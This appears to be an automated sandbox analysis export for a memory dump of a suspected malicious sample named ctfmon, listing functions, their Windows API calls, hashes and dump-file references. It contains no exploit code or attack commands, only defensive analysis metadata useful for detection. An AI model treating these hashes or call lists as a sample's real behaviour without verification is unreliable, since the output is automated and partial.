Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FormatFreeH_prologLocalMessagelstrcpyn
String ID:
API String ID: 1069405352-0
Opcode ID: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
Instruction ID: fdd3b3ea3dca44e7a97c76a848adebdcda81641acace6f1e1dd778b80c94f713
Opcode Fuzzy Hash: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
Instruction Fuzzy Hash: 5C112232610328FBCB20AF91EC05AEF7FA8FF08760F50441AF9089A190D3759A51CBD8

Function 0041CDC1 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0041CDE3
GetWindow.USER32(00000000,00000005), ref: 0041CDFF
GetWindow.USER32(00000000,00000002), ref: 0041CE15
GetWindow.USER32(00000000,00000002), ref: 0041CE20

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
Instruction ID: f7176755ff76171dbc3ca36412ed8f896c65f43d2b9e194da37f980429bdcab7
Opcode Fuzzy Hash: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
Instruction Fuzzy Hash: 59F0A47738070122D222756A7CC6FAB7B988BD2B51F50043AF600A6282EE59E855426D

Function 0041C380 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00000000,?,?,?), ref: 0041C39B
UnhookWindowsHookEx.USER32(00000000), ref: 0041C3B4
GetWindowLongA.USER32(?,000000F0), ref: 0041C3CB
SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 0041C3F5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
String ID:
API String ID: 4187046592-0
Opcode ID: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
Instruction ID: e56733217a63c98b9cfcbaa9d3ee52952c096190bbd855f3486cba2e69e87e11
Opcode Fuzzy Hash: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
Instruction Fuzzy Hash: B91133B5600200AFD314DF54ECA4E6B77E5AB98314F40843DF545C33A0D774E848CB55

Function 0041CEB1 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0041CEE5
GetWindowLongA.USER32(?,000000F0), ref: 0041CEF2
SetTextColor.GDI32(?,?), ref: 0041CF0F
SetBkColor.GDI32(?,?), ref: 0041CF1D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ColorWindow$LongText
String ID:
API String ID: 3945788684-0
Opcode ID: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
Instruction ID: 333cb50309b1e51d381b8678f90b3801f6ee55970ce0cf9ad49621ef8d753c56
Opcode Fuzzy Hash: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
Instruction Fuzzy Hash: FD01DD36249210ABD730D764BCC8DEF7795EB62721F14052BEA41D31D4C724A9C7C65D

Function 004254BA Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004254EE
GetCurrentProcess.KERNEL32(?,00000000), ref: 004254F4
DuplicateHandle.KERNEL32(00000000), ref: 004254F7
GetLastError.KERNEL32(00000000), ref: 00425511

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
Instruction ID: ba12cf247d713ca83e744a91bb1c1a492d77c11568612e8c832d1772640133eb
Opcode Fuzzy Hash: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
Instruction Fuzzy Hash: 5901FC31700210BBEB10ABA5EC8AF1ABB9DDF44711F544426F519C7281EAB4DC408B64

Function 0041C860 Relevance: 6.1, APIs: 4, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C866
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041C873
UnhookWindowsHookEx.USER32(?), ref: 0041C8B6
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041C8FB

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
Instruction ID: fe24c6a5f78cf2ac84ca5597e3b7d88d370af96ecf399c2d86962ad3691242d6
Opcode Fuzzy Hash: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
Instruction Fuzzy Hash: 20119135690208EFC730EF65ECC46EA73A5FB1130AF60143AE60683591E735B89ADB94

Function 0042317F Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0042318D
SendMessageW.USER32(00000000,?,?,?), ref: 004231C3
GetTopWindow.USER32(00000000), ref: 004231D0
GetWindow.USER32(00000000,00000002), ref: 004231EE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
Instruction ID: d55262b01c94f31a90e2b1312f8a616a94e02ae52ed97f2f18e0d229c57d5f04
Opcode Fuzzy Hash: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
Instruction Fuzzy Hash: 8301E936201229BBCF126F91AC05EEF3B7AAF05351F844516FA0451124C73ECA72EBA9

Function 00423106 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00423111
GetTopWindow.USER32(00000000), ref: 00423124
GetTopWindow.USER32(?), ref: 00423154
GetWindow.USER32(00000000,00000002), ref: 0042316F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
Instruction ID: 345862615f9688ebf3cdbf4b66b4982080435a2b4c306f56a0d53421e26843f6
Opcode Fuzzy Hash: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
Instruction Fuzzy Hash: CB018435301139778F222F62AC00EBF7A79AF14392F854126FD0095214D73DCA3296DD

Function 00420C86 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 00420CAE
GetFocus.USER32 ref: 00420CC1
GetParent.USER32(?), ref: 00420CCF
GetNextDlgTabItem.USER32(?,?,00000000), ref: 00420CEB

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
Instruction ID: 8a4b78d4f47e5053a81751d92e7ee6ced98987c858b46bcdd7bf6efd082f8e31
Opcode Fuzzy Hash: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
Instruction Fuzzy Hash: 16113C713006109BDB38AF21E859B2BB7F5AF90314FA0462EE546875A1CB78E891CB59

Function 0041CAA0 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041CAA6
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041CAB3
UnhookWindowsHookEx.USER32(?), ref: 0041CAEA
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041CB29

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
Instruction ID: 73ecd1883983c7791e4a145524bf18d34c630e1f3d92ae3c2823ecf711c72ab0
Opcode Fuzzy Hash: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
Instruction Fuzzy Hash: 3B01C075290608AFC730DF65FCC95EA33A4FB01349B20147AE606C3591E735B8AACF90

Function 00427330 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042735C
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427365
wsprintfW.USER32 ref: 00427381
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0042739A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
Instruction ID: 6d4ab68f11891ff308c174a238285f84ccdd3e51e257b8ace891e9d2ef57e05c
Opcode Fuzzy Hash: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
Instruction Fuzzy Hash: EA016272600224BBCF219FA4EC09FDE37A9AF08714F844026FE15E6190E7B4D511DB9C

Function 004237B3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000000,0000000C,?), ref: 004237F1
SetBkColor.GDI32(00000000,00000000), ref: 004237FD
GetSysColor.USER32(00000008), ref: 0042380D
SetTextColor.GDI32(00000000,?), ref: 00423817

Part of subcall function 00426950: GetWindowLongW.USER32(00000000,000000F0), ref: 00426961

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
Instruction ID: 996a509eb5483e03d1280d7cc741f4f8e1f151524dd7178acde86eebcbf6a08c
Opcode Fuzzy Hash: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
Instruction Fuzzy Hash: 13011E30600155AEDF21AF54EC45AAE3BF5AB00342F944522FA02C91A0CB78CE91D69A

Function 004265E6 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
Instruction ID: 5e34c4cd6609403dc149269c458482475ccf921670738db4690db06b0d034127
Opcode Fuzzy Hash: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
Instruction Fuzzy Hash: D3F01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94

Function 00426A3A Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00426A47
GetWindowTextW.USER32(?,?,00000100), ref: 00426A63
lstrcmpW.KERNEL32(?,?), ref: 00426A77
SetWindowTextW.USER32(?,?), ref: 00426A87

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
Instruction ID: c0d20ed1f89d7020bcb479a82dbdd8d31feb51cd73047c170cfc194cd6cd2529
Opcode Fuzzy Hash: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
Instruction Fuzzy Hash: D4F01235A00129BBDF216F64EC88ADE7B69FB05390F448161F819E1160EB35DD568B98

Function 00429532 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00429554
GetTickCount.KERNEL32 ref: 00429561
CoFreeUnusedLibraries.OLE32 ref: 00429570
GetTickCount.KERNEL32 ref: 00429576

Part of subcall function 004294D7: CoFreeUnusedLibraries.OLE32 ref: 0042951F
Part of subcall function 004294D7: OleUninitialize.OLE32 ref: 00429525

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
Instruction ID: 909b3d72e97e5b8f4fa77f634aeb50083d73612e72484a6c6d3d5ea4d5bcd909
Opcode Fuzzy Hash: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
Instruction Fuzzy Hash: 60E01271E05125FBC711AF60FD8865E37A0EB14311F905877D04192264C7785C85DF9D

Function 00407B04 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407B09
VariantClear.OLEAUT32(?), ref: 00407C8E

Strings

@, xrefs: 00407B56

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @
API String ID: 1166855276-2766056989
Opcode ID: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
Instruction ID: b858331317e13cfe4e871a22f7291cb985bca7952d51c674c1c62d25b1df6737
Opcode Fuzzy Hash: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
Instruction Fuzzy Hash: 3C51A370E002199FDB14CFA9C888AEEB7F9FF48304F20856AE516E7251E774A906CF50

Function 0041803B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?), ref: 0041804F

Strings

, xrefs: 00418098
, xrefs: 00418074

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
Instruction ID: 80a56d3aed95c468bd87d356a319ccf427369d6e1cb2682b21b51dc1b754c7b8
Opcode Fuzzy Hash: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
Instruction Fuzzy Hash: 5741DF3280425C2EDB118714CDA9FFB7FA99B12740F1804FED585C7252CB294989D7AA

Function 0040C6E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

IsChild.USER32(?,?), ref: 0040C704
GetWindowLongW.USER32(?,000000EC), ref: 0040C71B

Strings

0, xrefs: 0040C790

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ChildLongWindow
String ID: 0
API String ID: 1178903432-4108050209
Opcode ID: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
Instruction ID: 80f36ecc902128788ccff313db005aea39b01ff33b9cc0f7ff94248ddef8e30b
Opcode Fuzzy Hash: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
